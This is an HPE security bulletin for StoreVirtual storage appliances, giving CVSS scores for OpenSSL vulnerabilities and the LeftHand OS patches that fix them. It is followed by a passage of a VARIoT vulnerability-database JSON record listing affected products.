- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2010-5298
4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVE-2014-0076
4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
CVE-2014-0195
7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0198
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0221
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0224
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-3470
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-3566
3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVE-2016-0705
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE recommends applying the following software updates to resolve the vulnerabilities in the impacted versions of HPE StoreVirtual products running HPE LeftHand OS.
LeftHand OS v11.5 - Patches 45019-00 and 45020 LeftHand OS v12.0 - Patches 50016-00 and 50017-00 LeftHand OS v12.5 - Patch 55016-00 LeftHand OS v12.6 - Patch 56002-00
Notes:
These patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision to OpenSSL v1.0.1e 48. These patches migrate Certificate Authority Hashing Algorithm from a weak hashing algorithm SHA1 to the stronger hashing algorithm SHA256
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0514", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "flex system chassis management module", "scope": "eq", "trust": 1.5, "vendor": "ibm", "version": "1.50.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.3a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.3" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.4" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6h" }, { "model": "bladecenter -t 3.66b", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter advanced management module 3.66c", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -h 3.66b", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -e 3.66b", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter advanced management module 3.66b", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -s 3.66c", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -ht 3.66c", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -ht 3.66b", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -h 3.66c", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -t 3.66c", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -e 3.66c", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter -s 3.66b", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter t advanced management module 3.66b", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "flex system chassis management module", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.50.0" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "junos d30", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "junos 12.1x44-d33", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v210.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571471.43" }, { "model": "junos 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571431.43" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "junos 12.1x44-d50", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "tivoli workload scheduler distributed ga level", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "junos r8-s2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "sa6500 ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "sa700 ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.3r4.6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos r1", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.17" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "junos 12.1r8-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "flex system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.9" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "junos r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "junos 12.1x47-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 